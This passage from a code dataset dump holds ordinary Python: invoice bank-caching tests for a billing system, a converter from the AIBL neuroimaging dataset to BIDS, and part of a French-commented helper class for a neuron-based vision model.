'bank_ids': {bd.bank_id: None}})\n\n i = create_invoice(session, client, 'ur', firm.id)\n\n assert i.bank_details_id == bd.id\n assert client.banks == [client_bank]\n assert client_bank.bank_id == bd.bank_id\n\n\ndef test_cache_w_aliases_matched(session, client, client_aliases, firm, paysys_ur):\n bd = create_bank_details(session, firm)\n create_bank_details(session, firm)\n client_banks = []\n for alias in client_aliases:\n client_banks.append(create_client_bank(session, alias, bd.payment_bank, firm))\n\n i = create_invoice(session, client, 'ur', firm.id)\n\n assert i.bank_details_id == bd.id\n assert all(cb.client in client_aliases for cb in client.banks)\n\n\ndef test_cache_w_aliases_unmatched(session, client, client_aliases, firm, paysys_ur):\n bd = create_bank_details(session, firm)\n alt_bank = create_bank(session)\n client_banks = []\n for alias in client_aliases:\n client_banks.append(create_client_bank(session, alias, alt_bank, firm))\n\n i = create_invoice(session, client, 'ur', firm.id)\n\n client_banks.sort(key=lambda cb: cb not in session)\n assert i.bank_details_id == bd.id\n assert client_banks[0].client_id == client.id\n assert client_banks[0].bank_id == bd.bank_id\n assert all(cb not in session for cb in client_banks[1:])\n\n\ndef test_cache_wo_firm_matched(session, client, client_aliases, firm, paysys_ur):\n bd = create_bank_details(session, firm)\n\n client_bank = create_client_bank(session, client, bd.payment_bank, None)\n\n i = create_invoice(session, client, 'ur', firm.id)\n\n assert i.bank_details_id == bd.id\n assert client.banks == [client_bank]\n assert client_bank.firm_id == firm.id\n\n\ndef test_cache_wo_firm_unmatched(session, client, client_aliases, firm, paysys_ur):\n bd = create_bank_details(session, firm)\n alt_bank = create_bank(session)\n\n client_bank = create_client_bank(session, client, alt_bank, None)\n\n i = create_invoice(session, client, 'ur', firm.id)\n\n assert i.bank_details_id == bd.id\n assert client.banks == [client_bank]\n assert client_bank.bank_id == bd.bank_id\n assert client_bank.firm_id == firm.id\n\n\ndef test_cache_wo_firm_unmatched_multiple(session, client, client_aliases, firm, paysys_ur):\n \"\"\"\n У клиента существует 2 ClientBank, и оба с неправильным банком.\n После вызова Invoice.update_bank_id должен остаться один из них (случайный).\n Ему должен проставится правильный bank_id и фирма.\n Второй ClientBank (лишний) должен быть удален.\n \"\"\"\n bd = create_bank_details(session, firm)\n alt_bank1 = create_bank(session)\n alt_bank2 = create_bank(session)\n\n client_bank = create_client_bank(session, client, alt_bank1, firm)\n client_bank_alt = create_client_bank(session, client, alt_bank2, None)\n\n i = create_invoice(session, client, 'ur', firm.id)\n\n assert i.bank_details_id == bd.id\n assert len(client.banks) == 1\n chosen_client_bank = client.banks[0]\n assert chosen_client_bank in (client_bank, client_bank_alt)\n assert chosen_client_bank.bank_id == bd.bank_id\n assert chosen_client_bank.firm_id == firm.id\n excess_client_bank = client_bank_alt if chosen_client_bank is client_bank else client_bank\n assert excess_client_bank not in session\n\n\ndef test_yinvoice_new_bank(session, rules):\n bank_details = (\n session.query(mapper.BankDetails)\n .filter_by(currency='RUR', firm_id=1)\n .order_by(mapper.BankDetails.id)\n .first()\n )\n rules.append({'person_type': 'ur', 'bank_ids': {bank_details.bank_id: None}})\n\n client = ob.ClientBuilder(is_agency=True).build(session).obj\n subclient = ob.ClientBuilder(agency=client).build(session).obj\n contract = ob.ContractBuilder(\n dt=datetime.datetime.now() - datetime.timedelta(days=66),\n client=client,\n person=ob.PersonBuilder(client=client, type='ur'),\n commission=1,\n payment_type=3,\n credit_type=1,\n payment_term=30,\n payment_term_max=60,\n personal_account=1,\n personal_account_fictive=1,\n currency=810,\n lift_credit_on_payment=1,\n commission_type=57,\n repayment_on_consume=1,\n credit_limit_single=1666666,\n services={7},\n is_signed=datetime.datetime.now(),\n firm=1,\n ).build(session).obj\n session.flush()\n\n order = ob.OrderBuilder(\n product=ob.Getter(mapper.Product, DIRECT_PRODUCT_ID),\n client=subclient, agency=client,\n ).build(session).obj\n basket = ob.BasketBuilder(\n client=contract.client,\n rows=[ob.BasketItemBuilder(quantity=6666, order=order)]\n )\n\n paysys = session.query(mapper.Paysys).filter_by(firm_id=FirmId.YANDEX_OOO).getone(cc='ur')\n pa = ob.PayOnCreditCase(session).pay_on_credit(basket, contract, paysys)[0]\n # симулируем случай когда закешированных банков нет\n session.delete(client.banks[0])\n session.flush()\n session.expire(client, ['banks'])\n\n order.calculate_consumption(datetime.datetime.now() - datetime.timedelta(days=32), {order.shipment_type: 100})\n act_accounter = a_a.ActAccounter(\n contract.client, a_a.ActMonth(for_month=datetime.datetime.now()),\n force=True, dps=[], invoices=[pa.id]\n )\n act, = act_accounter.do(skip_cut_agava=True)\n invoice = act.invoice\n\n assert invoice.bank_details_id == bank_details.id\n assert [cb.bank_id for cb in client.banks] == [bank_details.bank_id]\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"billing/balance_tests/invoices/test_default_bank.py","file_name":"test_default_bank.py","file_ext":"py","file_size_in_byte":13368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32871335196","text":"# coding: utf8\n\n\"\"\"\nConvert the AIBL dataset (http://www.aibl.csiro.au/) into BIDS.\n\"\"\"\n\n__author__ = \"Simona Bottani\"\n__copyright__ = \"Copyright 2016-2019 The Aramis Lab Team\"\n__credits__ = [\"Simona Bottani\"]\n__license__ = \"See LICENSE.txt file\"\n__version__ = \"0.1.0\"\n__maintainer__ = \"Simona Bottani\"\n__email__ = \"simona.bottani@icm-institute.org\"\n__status__ = \"Development\"\n\n\ndef convert_images(path_to_dataset, path_to_csv, bids_dir):\n\n # Conversion of the entire dataset in BIDS\n from clinica.utils.stream import cprint\n from os.path import exists\n from colorama import Fore\n\n from clinica.iotools.converters.aibl_to_bids.aibl_utils import paths_to_bids\n list_of_created_files = []\n\n for modality in ['t1', 'av45', 'flute', 'pib']:\n list_of_created_files.append(paths_to_bids(path_to_dataset,\n path_to_csv,\n bids_dir,\n modality))\n\n error_string = ''\n for modality_list in list_of_created_files:\n for file in modality_list:\n if not exists(str(file)):\n error_string = error_string + str(file) + '\\n'\n if error_string != '':\n cprint(Fore.RED + 'The following file were not converted '\n + ' (nan means no path was found):\\n'\n + error_string\n + Fore.RESET)\n\n\ndef convert_clinical_data(bids_dir, path_to_csv):\n from os.path import exists\n # clinical specifications in BIDS\n from os.path import join, split, realpath\n from clinica.iotools.converters.aibl_to_bids.aibl_utils import create_participants_df_AIBL, \\\n create_sessions_dict_AIBL\n\n clinical_spec_path = join(split(realpath(__file__))[0], '../../data/clinical_specifications.xlsx')\n if not exists(clinical_spec_path):\n raise FileNotFoundError(clinical_spec_path + ' file not found ! This is an internal file of Clinica.')\n\n create_participants_df_AIBL(bids_dir, clinical_spec_path, path_to_csv, delete_non_bids_info=True)\n create_sessions_dict_AIBL(bids_dir, path_to_csv, clinical_spec_path)\n","repo_name":"adamwild/clinica","sub_path":"clinica/iotools/converters/aibl_to_bids/aibl_to_bids.py","file_name":"aibl_to_bids.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"14270076656","text":"import numpy as np\nimport networkx as nx\n\nfrom .sentive_vision_neuron import sentive_vision_neuron\nfrom .sentive_sequence_nrn import sentive_sequence_nrn\n\nclass sentive_neuron_helper():\n def __init__(self):\n \n self.init_matrix = []\n self.init_matrix.append( np.array([[1, 0, -1],[1, 0, -1],[1, 0, -1]]))\n self.init_matrix.append( np.array([[1, 1, 1],[0, 0, 0],[-1, -1, -1]]))\n self.init_matrix.append( np.array([[1, 1, 0],[1, 0, -1],[0, -1, -1]]))\n self.init_matrix.append( np.array([[0, -1, -1],[1, 0, -1],[1, 1, 0]]))\n\n\n self.dir_matrix = np.array([[1, 1, 1],[1, 0, 1],[1, 1, 1]])\n\n\n self.ok_conf = []\n self.ok_conf.append( np.array([[1, 0, -1],[0, 1, 0],[0, 0, 0]]))\n self.ok_conf.append( np.array([[1, 0, 0],[0, 1, -1],[0, 0, 0]]))\n self.ok_conf.append( np.array([[1, 0, 0],[0, 1, 0],[0, 0, -1]]))\n \n self.ok_conf.append( np.array([[0, 0, -1],[1, 1, 0],[0, 0, 0]]))\n self.ok_conf.append( np.array([[0, 0, 0],[1, 1, -1],[0, 0, 0]]))\n self.ok_conf.append( np.array([[0, 0, 0],[1, 1, 0],[0, 0, -1]]))\n \n self.ok_conf.append( np.array([[0, 0, -1],[0, 1, 0],[1, 0, 0]]))\n self.ok_conf.append( np.array([[0, 0, 0],[0, 1, -1],[1, 0, 0]]))\n self.ok_conf.append( np.array([[0, 0, 0],[0, 1, 0],[1, 0, -1]]))\n \n self.ok_conf.append( np.array([[0, 0, 1],[0, 1, 0],[0, 0, -1]]))\n self.ok_conf.append( np.array([[0, 1, 0],[0, 1, 0],[0, 0, -1]]))\n \n self.ok_conf.append( np.array([[1, 0, 0],[0, 1, 0],[0, -1, 0]]))\n self.ok_conf.append( np.array([[0, 1, 0],[0, 1, 0],[0, -1, 0]]))\n \n self.ok_conf.append( np.array([[1, 0, 0],[0, 1, 0],[-1, 0, 0]]))\n self.ok_conf.append( np.array([[0, 1, 0],[0, 1, 0],[-1, 0, 0]]))\n \n self.lst_nrns = []\n self.id_nrn = 0 # id max des neurones\n self.nb_nrns = 0 # nb de neurones dans le tableau (sans avoir à utiliser la fonction len)\n \n # https://networkx.org/documentation/stable/tutorial.html\n self.netGraph = nx.Graph()\n\n self.layer_nb = 0\n self.layer_graph = []\n\n self.nb_2_1st_layers = 0\n\n\n def new_layer(self):\n self.layer_nb +=1\n self.layer_graph.append(nx.DiGraph())\n\n \n def add_edge(self, nrn1_id, nrn2_id):\n self.netGraph.add_edge(nrn1_id, nrn2_id)\n if self.layer_nb>0:\n self.layer_graph[self.layer_nb-1].add_edge(nrn1_id, nrn2_id)\n\n\n def increment_weight(self, nrn, nrn_post_synaptic_id):\n try:\n nrn[\"DbConnectivity\"][\"weights\"][nrn_post_synaptic_id] += 1\n except KeyError:\n nrn[\"DbConnectivity\"][\"weights\"][nrn_post_synaptic_id] = 1\n\n \n def add_new_nrn(self, nrn_type=''):\n \"\"\"Ajoute un nouveau neurone au pool (remplace la base de données MongoDB de Sentive AI en mode non cloud)\n\n Returns:\n [int]: [identifiant du nouveau neurone créé]\n \"\"\"\n self.id_nrn += 1\n if nrn_type=='':\n self.lst_nrns.append(sentive_vision_neuron(self.id_nrn))\n else:\n self.lst_nrns.append(sentive_sequence_nrn(self.id_nrn))\n \n self.netGraph.add_node(self.id_nrn)\n\n if self.layer_nb>0:\n self.layer_graph[self.layer_nb-1].add_node(self.id_nrn)\n\n self.nb_nrns = len(self.lst_nrns)\n self.lst_nrns[self.nb_nrns-1].neuron[\"layer_id\"] = self.layer_nb\n\n return self.nb_nrns - 1\n \n \n def FctIterMean(self, Nb_activations, NewAct, avgValue):\n \"\"\"Calcule la Moyenne itérative\n\n Args:\n Nb_activations ([int]): [nb de valeur intégrée dans la moyenne précédente]\n NewAct ([float]): [Nouvelle valeur à intégrer à la moyenne]\n avgValue ([float]): [valeur moyenne précédemment calculée]\n\n Returns:\n [float]: [nouvelle moyenne]\n \"\"\"\n Nb_activations = int(Nb_activations)\n NewAct = float(NewAct)\n avgValue = float(avgValue)\n return ((Nb_activations - 1) / Nb_activations\n * avgValue + NewAct / Nb_activations)\n \n \n def get_x_matrix(self, size):\n size = int(size)\n if size>=2:\n output = np.array([np.arange(size),np.arange(size)])\n else:\n return np.array(np.arange(size))\n for i in range(2,size):\n output = np.append(output,[np.arange(size)],axis=0)\n return output\n\n \n def get_y_matrix(self, size):\n size = int(size)\n if size>=2:\n output = np.array([np.ones(size)*0,np.ones(size)*1])\n else:\n return np.array(np.arange(size))\n for i in range(2,size):\n output = np.append(output,[np.ones(size)*i],axis=0)\n return output\n \n \n def get_matrix_center(self, size):\n \"\"\"Retourne les coordonnées du centre de la matrice de taille \"size\"\n\n Args:\n size ([int]): [de prédérence une matrice carré de taille impaire]\n\n Returns:\n [int]: [coordonnées x et y du centre de la matrice carré impaire]\n \"\"\"\n return np.floor(size/2)\n \n \n def get_receptive_field(self, local_neuron, current_vision):\n \"\"\"\n \n \"\"\"\n min_val_y = int(local_neuron[\"meta\"][\"center\"][\"y\"] - np.floor(\n local_neuron[\"meta\"][\"matrix_width\"]/2))\n max_val_y = int(local_neuron[\"meta\"][\"center\"][\"y\"] + np.ceil(\n local_neuron[\"meta\"][\"matrix_width\"]/2))\n min_val_x = int(local_neuron[\"meta\"][\"center\"][\"x\"] - np.floor(\n local_neuron[\"meta\"][\"matrix_width\"]/2))\n max_val_x = int(local_neuron[\"meta\"][\"center\"][\"x\"] + np.ceil(\n local_neuron[\"meta\"][\"matrix_width\"]/2))\n return current_vision[min_val_y:max_val_y, min_val_x:max_val_x, 0]\n \n\n def get_all_center_fields(self, list_neurons, current_vision):\n \"\"\"\n Retourne l'image avec les centres des neurones surlignés\n Pour l'ensemble des neurones\n \"\"\"\n nb = 0\n for sent_neuron in list_neurons:\n neuron = sent_neuron.neuron[\"meta\"]\n current_vision[neuron[\"center\"][\"y\"],neuron[\"center\"][\"x\"]] = 5 #* current_vision[neuron[\"center\"][\"y\"],neuron[\"center\"][\"x\"]]\n nb += 1\n print(nb,\"neurons\")\n return current_vision\n \n \n def get_all_center_fields_width(self, list_neurons, current_vision, lint_width=5):\n \"\"\"\n Retourne l'image avec les centres des neurones surlignés\n Il faut spécifier la couche des neurones sélectionnés\n \"\"\"\n nb = 0\n for sent_neuron in list_neurons:\n neuron = sent_neuron.neuron[\"meta\"]\n if neuron[\"matrix_width\"] == lint_width:\n current_vision[neuron[\"center\"][\"y\"],neuron[\"center\"][\"x\"]] = 5 #* current_vision[neuron[\"center\"][\"y\"],neuron[\"center\"][\"x\"]]\n nb += 1\n print(nb,\"neurons\")\n return current_vision\n\n \n def get_neuron_receptive_field(self, nrn_id, current_vision, neurons_pool=-1, verbose=False):\n \"\"\"Retourne le champs récepteur du neurone sur la matrice current_vision.\n\n Args:\n current_vision ([type]): [description]\n nrn_id ([type]): [description]\n neurons_pool (int, optional): [description]. Defaults to -1.\n verbose (bool, optional): [description]. Defaults to False.\n\n Returns:\n [matrice]: [matrice contenant la position du champs récepteur du neurone nrn_id]\n \"\"\"\n\n if neurons_pool==-1:\n neurons_pool = self.lst_nrns\n \n # récupère le neurone visé\n crnt_nrn = self.get_neuron_from_id(nrn_id, neurons_pool)\n # récupère la liste des \n try:\n lst_nrn = crnt_nrn[\"meta\"][\"field_list\"]\n except KeyError:\n lst_nrn = crnt_nrn[\"DbConnectivity\"][\"pre_synaptique\"]\n \n # récupère le neurone pour chaque id de la liste\n nb = 0\n for sensor_id in lst_nrn:\n neuron = self.get_neuron_from_id(sensor_id, neurons_pool)\n current_vision[neuron[\"meta\"][\"center\"][\"y\"],neuron[\"meta\"][\"center\"][\"x\"]] = 5\n nb +=1\n if verbose:\n print(nb, \"pixels\")\n print(crnt_nrn)\n return current_vision\n \n \n def update_coord(self, previous):\n \"\"\"\n lorsqu'on augmente la taille de la matrice de +2\n Toutes les coordonnées relatives à la taille précédente doivent être modifiées grace \n à cette fonction.\n \"\"\"\n previous[\"x\"] += 1\n previous[\"y\"] += 1\n return previous\n \n \n def rotate_vector(self, vector, angle_rotation):\n \"\"\"Retourne les coordonnées du vector après rotation\n TODO: cette fonction n'est semble t'il jamais appelée\n\n Args:\n vector ([struct]): [structure contenant les coordonnées (x,y) d'un vecteur]\n angle_rotation ([float]): [exprimé en radian]\n\n Returns:\n [type]: [description]\n \"\"\"\n output_vector = {\n \"x\":0,\n \"y\":0\n }\n output_vector[\"x\"] = np.around(vector[\"x\"] * np.cos(angle_rotation) - vector[\"y\"] * np.sin(angle_rotation))\n output_vector[\"y\"] = np.around(vector[\"x\"] * np.sin(angle_rotation) + vector[\"y\"] * np.cos(angle_rotation))\n return output_vector\n \n \n def anti_rotate_vector(self, vector, angle_rotation):\n output_vector = {\n \"x\":0,\n \"y\":0\n }\n output_vector[\"x\"] = np.around(vector[\"x\"] * np.cos(angle_rotation) + vector[\"y\"] * np.sin(angle_rotation))\n output_vector[\"y\"] = np.around(vector[\"y\"] * np.cos(angle_rotation) - vector[\"x\"] * np.sin(angle_rotation))\n return output_vector\n \n \n def get_pos_from_id(self, neuron_idx2, neurons_pool=-1):\n \"\"\"\n retourne la position dans la tableau à partir du neuron_id\n \"\"\"\n if neurons_pool==-1:\n neurons_pool = self.lst_nrns\n for neuron_idx in range(len(neurons_pool)):\n if neurons_pool[neuron_idx].neuron[\"_id\"]==neuron_idx2:\n break\n return neuron_idx\n \n \n def get_neuron_from_id(self, neuron_idx2, neurons_pool=-1):\n \"\"\"\n retourne le neurone à partir de son neuron_id \"_id\"\n \"\"\"\n if neurons_pool==-1:\n neurons_pool = self.lst_nrns\n for neuron_idx in range(len(neurons_pool)):\n if neurons_pool[neuron_idx].neuron[\"_id\"]==neuron_idx2:\n return neurons_pool[neuron_idx].neuron\n return ''\n \n \n def get_avg_center(self, list_neuron_ids, neurons_pool=-1):\n \"\"\"\n retourne la moyenne des centres à partir des neurones_id passés en paramètres\n \"\"\"\n if neurons_pool==-1:\n neurons_pool = self.lst_nrns\n \n list_x = []\n list_y = []\n\n output={\n \"center\":{\n \"x\":0,\n \"y\":0\n },\n \"real_center\":{\n \"x\":0,\n \"y\":0\n }\n }\n\n for int_id in list_neuron_ids:\n current_neuron = self.get_neuron_from_id(int_id, neurons_pool)\n list_x.append(current_neuron[\"meta\"][\"center\"][\"x\"])\n list_y.append(current_neuron[\"meta\"][\"center\"][\"y\"])\n\n output[\"real_center\"][\"y\"]=np.mean(list_y)\n output[\"real_center\"][\"x\"]=np.mean(list_x)\n\n output[\"center\"][\"x\"]= int(np.round(output[\"real_center\"][\"x\"]))\n output[\"center\"][\"y\"] = int(np.round(output[\"real_center\"][\"y\"]))\n return output\n\n \n def calc_angle(self, vector1, vector2):\n # calcul de l'angle de rotation entre les deux vecteurs passés en paramètres\n np_c_1 = np.array([vector1[\"x\"], vector1[\"y\"]])\n np_c_2 = np.array([vector2[\"x\"], vector2[\"y\"]])\n np_c_3 = np.array([-vector1[\"y\"], vector1[\"x\"]])\n signe = 1\n test = np.sum(np.multiply(np_c_3,np_c_2))\n if test < 0 :\n signe = -1\n return signe * np.arccos(np.sum(np.multiply(np_c_1,np_c_2))/(np.sqrt(np.sum(np.power(np_c_1,2)))*np.sqrt(np.sum(np.power(np_c_2,2)))))\n \n \n def calc_dist(self, point1, point2):\n \"\"\"Calcule la distance entre deux points\n\n Args:\n point1 ([struct]): [description]\n point2 ([struct]): [description]\n\n Returns:\n [float]: [distance exprimé dans la même unités que les coordonnées des points passés en paramètres]\n \"\"\"\n X_D = pow(point1[\"x\"] - point2[\"x\"],2)\n Y_D = pow(point1[\"y\"] - point2[\"y\"],2)\n return pow(X_D+Y_D,0.5)\n\n\n def calc_total_distance(self, nrn_list, neurons_pool=-1):\n output_total = 0\n if neurons_pool==-1:\n neurons_pool = self.lst_nrns\n nrn = self.get_neuron_from_id(nrn_list[0], neurons_pool)\n point1 = nrn[\"meta\"][\"center\"]\n for nrn_pos in range(1, len(nrn_list)):\n nrn_id = nrn_list[nrn_pos]\n nrn = self.get_neuron_from_id(nrn_id, neurons_pool)\n point2 = nrn[\"meta\"][\"center\"]\n sub_dist = self.calc_dist(point1, point2)\n output_total += sub_dist\n point1 = point2\n return output_total\n\n\n def get_gbl_orientO(self, nrn):\n hand_1 = nrn[\"meta\"][\"local_tip_1\"]\n hand_2 = nrn[\"meta\"][\"local_tip_2\"]\n v_outpt = {\"x\":0,\"y\":0}\n \n if hand_1[\"x\"]< hand_2[\"x\"]:\n v_outpt[\"x\"] = hand_2[\"x\"] - hand_1[\"x\"]\n v_outpt[\"y\"] = hand_2[\"y\"] - hand_1[\"y\"]\n elif hand_1[\"x\"] > hand_2[\"x\"]:\n v_outpt[\"x\"] = hand_1[\"x\"] - hand_2[\"x\"]\n v_outpt[\"y\"] = hand_1[\"y\"] - hand_2[\"y\"]\n elif hand_1[\"y\"]< hand_2[\"y\"]:\n v_outpt[\"x\"] = hand_2[\"x\"] - hand_1[\"x\"]\n v_outpt[\"y\"] = hand_2[\"y\"] - hand_1[\"y\"]\n elif hand_1[\"y\"] > hand_2[\"y\"]:\n v_outpt[\"x\"] = hand_1[\"x\"] - hand_2[\"x\"]\n v_outpt[\"y\"] = hand_1[\"y\"] - hand_2[\"y\"]\n return v_outpt\n\n \n def get_global_orientation(self, nrn_id, neurons_pool=-1):\n \"\"\"Retourne le vecteur allant directement d'une extrémité à l'autre\n du champs récepteur du neurone\n Globalement orienté de gauche à droite et sinon de bas en haut.\n\n Args:\n nrn_id (int): identifiant du neurone\n neurons_pool (list, optional): base de données des neurones. Defaults to -1.\n\n Returns:\n struct: vecteyr donnant l'orientation générale\n \"\"\"\n if neurons_pool==-1:\n neurons_pool = self.lst_nrns\n\n nrn = self.get_neuron_from_id(nrn_id, neurons_pool)\n\n return self.get_gbl_orientO(nrn)\n \n \n \n def raw_rotate_vector(self, vector, angle_rotation):\n \"\"\"\n Retourne un angle après rotation\n Ne fait pas d'arrondi contrairement à l'autre fonction rotate_vector\n \"\"\"\n output_vector = {\n \"x\":0,\n \"y\":0\n }\n output_vector[\"x\"] = vector[\"x\"] * np.cos(angle_rotation) - vector[\"y\"] * np.sin(angle_rotation)\n output_vector[\"y\"] = vector[\"x\"] * np.sin(angle_rotation) + vector[\"y\"] * np.cos(angle_rotation)\n return output_vector\n \n \n def nrn_drwr(self, mtrx, vector, angle, length, start):\n \"\"\"\n Dessine un segment de courbe\n ============================\n En plus de la matrice dans laquelle il va dessiner, il ne prend que 4 paramètres.\n Le vecteur de départ, angle de rotation, la longueur (ou le nombre d'itérations).\n Et le point de départ.\n\n \"\"\"\n mtrx[start[\"y\"]][start[\"x\"]] = 1\n new_pos = {\"x\": start[\"x\"], \"y\": start[\"y\"]}\n tmp_pos = {\"x\": start[\"x\"], \"y\": start[\"y\"]}\n tmp_pos[\"x\"] = new_pos[\"x\"]+vector[\"x\"]\n new_pos[\"x\"] = int(round(tmp_pos[\"x\"]))\n tmp_pos[\"y\"] = new_pos[\"y\"]+vector[\"y\"]\n new_pos[\"y\"] = int(round(tmp_pos[\"y\"]))\n mtrx[new_pos[\"y\"]][new_pos[\"x\"]] = 1\n angle = angle / 2\n\n for i in range(length-1):\n # rotate vector\n vector = self.raw_rotate_vector(vector, angle)\n tmp_pos[\"x\"] = tmp_pos[\"x\"]+vector[\"x\"]\n new_pos[\"x\"] = int(round(tmp_pos[\"x\"]))\n tmp_pos[\"y\"] = tmp_pos[\"y\"]+vector[\"y\"]\n new_pos[\"y\"] = int(round(tmp_pos[\"y\"]))\n mtrx[new_pos[\"y\"]][new_pos[\"x\"]] = 1\n\n return mtrx\n\n\n def get_list_presyn(self, lst_nrn, neurons_pool=-1):\n \"\"\"retourne la liste des neurones pre_synaptique à partir d'une liste d'Identifiant et \n\n Args:\n lst_nrn ([list de integer]): [id des neurones]\n neurons_pool ([list de sentive_vision_neurons]): [base de données des neurones dans laquelle chercher]\n\n Returns:\n [list d'integer]: [les id des neurones présynaptique pour tous les neurones passés en entrée]\n \"\"\"\n if neurons_pool==-1:\n neurons_pool = self.lst_nrns\n lst_output = []\n for nrn_id in lst_nrn:\n lst_output.extend(self.get_neuron_from_id(nrn_id, neurons_pool)[\"DbConnectivity\"][\"pre_synaptique\"])\n # lst_output = list(set(lst_output.sort()))\n return lst_output\n \n\n def intersect_presyn_field_list(self, nrn_id_1, nrn_id_2, neurons_pool=-1):\n if neurons_pool==-1:\n neurons_pool = self.lst_nrns\n lst_nrn_1 = self.get_neuron_from_id(nrn_id_1, neurons_pool)[\"meta\"][\"field_list\"]\n # print(\"lst_nrn_1\",lst_nrn_1)\n list1 = self.get_list_presyn(lst_nrn_1, neurons_pool)\n lst_nrn_2 = self.get_neuron_from_id(nrn_id_2, neurons_pool)[\"meta\"][\"field_list\"]\n list2 = self.get_list_presyn(lst_nrn_2, neurons_pool)\n return list(set(list1).intersection(list2))\n\n\n def calc_tips(self, neuron_id, neurons_pool=-1):\n \"\"\"A partir de real_center calcule les distances avec chaque point de field list\n sélectionne les 2 neurones les plus éloignés du centre.\n Ce sont a priori les extrémités du segment.\n\n Args:\n neuron ([sentive_vision_neuron]): [description]\n\n Returns:\n [sentive_vision_neuron]: [modifié avec les bonnes informations des tips]\n \"\"\"\n output = {\n \"local_tip_1\":{\n \"x\":0,\n \"y\":0\n },\n \"vector_1\":{\n \"x\":0,\n \"y\":0\n },\n \"local_tip_2\":{\n \"x\":0,\n \"y\":0\n },\n \"vector_2\":{\n \"x\":0,\n \"y\":0\n },\n \"length_c\":0\n }\n if neurons_pool==-1:\n neurons_pool = self.lst_nrns\n \n neuron = self.get_neuron_from_id(neuron_id, neurons_pool)\n max_distance = 0.0\n tip_nrn_id = 0\n for nrn_id in neuron[\"meta\"][\"field_list\"]:\n crnt_nrn = self.get_neuron_from_id(nrn_id, neurons_pool)\n # calcule la distance entre ce neurone et le centre\n crnt_dist = self.calc_dist(neuron[\"meta\"][\"real_center\"],crnt_nrn[\"meta\"][\"center\"])\n if crnt_dist>max_distance:\n max_distance = crnt_dist\n tip_nrn_id = nrn_id\n # calcule les données output\n crnt_nrn = self.get_neuron_from_id(tip_nrn_id, neurons_pool)\n output[\"local_tip_1\"] = crnt_nrn[\"meta\"][\"center\"]\n\n # vérifie si la distance avec le tip1 est plus éloigné\n lcl_tip1 = {\n \"x\":0,\n \"y\":0\n }\n lcl_tip1[\"x\"] = output[\"local_tip_1\"][\"x\"] + crnt_nrn[\"meta\"][\"vector_1\"][\"x\"]\n lcl_tip1[\"y\"] = output[\"local_tip_1\"][\"y\"] + crnt_nrn[\"meta\"][\"vector_1\"][\"y\"]\n crnt_dist = self.calc_dist(neuron[\"meta\"][\"real_center\"],lcl_tip1)\n # si c'est le cas, utilise cette nouvelle distance\n if crnt_dist>max_distance:\n max_distance = crnt_dist\n output[\"local_tip_1\"] = lcl_tip1\n output[\"vector_1\"][\"y\"] = ( crnt_nrn[\"meta\"][\"vector_2\"][\"y\"] - crnt_nrn[\"meta\"][\"vector_1\"][\"y\"] ) / 2\n output[\"vector_1\"][\"x\"] = ( crnt_nrn[\"meta\"][\"vector_2\"][\"x\"] - crnt_nrn[\"meta\"][\"vector_1\"][\"x\"] ) / 2\n else:\n lcl_tip1[\"x\"] = output[\"local_tip_1\"][\"x\"] + crnt_nrn[\"meta\"][\"vector_2\"][\"x\"]\n lcl_tip1[\"y\"] = output[\"local_tip_1\"][\"y\"] + crnt_nrn[\"meta\"][\"vector_2\"][\"y\"]\n crnt_dist = self.calc_dist(neuron[\"meta\"][\"real_center\"],lcl_tip1)\n # si c'est le cas, utilise cette nouvelle distance\n if crnt_dist>max_distance:\n max_distance = crnt_dist\n output[\"local_tip_1\"] = lcl_tip1\n output[\"vector_1\"][\"y\"] = -( crnt_nrn[\"meta\"][\"vector_2\"][\"y\"] - crnt_nrn[\"meta\"][\"vector_1\"][\"y\"] ) / 2\n output[\"vector_1\"][\"x\"] = -( crnt_nrn[\"meta\"][\"vector_2\"][\"x\"] - crnt_nrn[\"meta\"][\"vector_1\"][\"x\"] ) / 2\n \n for nrn_id in neuron[\"meta\"][\"field_list\"]:\n crnt_nrn = self.get_neuron_from_id(nrn_id, neurons_pool)\n crnt_dist = self.calc_dist(output[\"local_tip_1\"],crnt_nrn[\"meta\"][\"center\"])\n if crnt_dist>max_distance:\n max_distance = crnt_dist\n tip_nrn_id = nrn_id\n # calcule les données output\n crnt_nrn = self.get_neuron_from_id(tip_nrn_id, neurons_pool)\n output[\"local_tip_2\"] = crnt_nrn[\"meta\"][\"center\"]\n output[\"vector_2\"][\"y\"] = ( crnt_nrn[\"meta\"][\"vector_2\"][\"y\"] - crnt_nrn[\"meta\"][\"vector_1\"][\"y\"] ) / 2\n output[\"vector_2\"][\"x\"] = ( crnt_nrn[\"meta\"][\"vector_2\"][\"x\"] - crnt_nrn[\"meta\"][\"vector_1\"][\"x\"] ) / 2\n\n # vérifie si la distance avec le tip1 est plus éloigné\n lcl_tip2 = {\n \"x\":0,\n \"y\":0\n }\n lcl_tip2[\"x\"] = output[\"local_tip_2\"][\"x\"] + crnt_nrn[\"meta\"][\"vector_1\"][\"x\"]\n lcl_tip2[\"y\"] = output[\"local_tip_2\"][\"y\"] + crnt_nrn[\"meta\"][\"vector_1\"][\"y\"]\n crnt_dist = self.calc_dist(output[\"local_tip_1\"],lcl_tip2)\n # si c'est le cas, utilise cette nouvelle distance\n if crnt_dist>max_distance:\n max_distance = crnt_dist\n output[\"local_tip_2\"] = lcl_tip2\n output[\"vector_2\"][\"y\"] = ( crnt_nrn[\"meta\"][\"vector_2\"][\"y\"] - crnt_nrn[\"meta\"][\"vector_1\"][\"y\"] ) / 2\n output[\"vector_2\"][\"x\"] = ( crnt_nrn[\"meta\"][\"vector_2\"][\"x\"] - crnt_nrn[\"meta\"][\"vector_1\"][\"x\"] ) / 2\n else:\n lcl_tip2[\"x\"] = output[\"local_tip_2\"][\"x\"] + crnt_nrn[\"meta\"][\"vector_2\"][\"x\"]\n lcl_tip2[\"y\"] = output[\"local_tip_2\"][\"y\"] + crnt_nrn[\"meta\"][\"vector_2\"][\"y\"]\n crnt_dist = self.calc_dist(output[\"local_tip_1\"],lcl_tip2)\n # si c'est le cas, utilise cette nouvelle distance\n if crnt_dist>=max_distance:\n max_distance = crnt_dist\n output[\"local_tip_2\"] = lcl_tip2\n output[\"vector_2\"][\"y\"] = -( crnt_nrn[\"meta\"][\"vector_2\"][\"y\"] - crnt_nrn[\"meta\"][\"vector_1\"][\"y\"] ) / 2\n output[\"vector_2\"][\"x\"] = -( 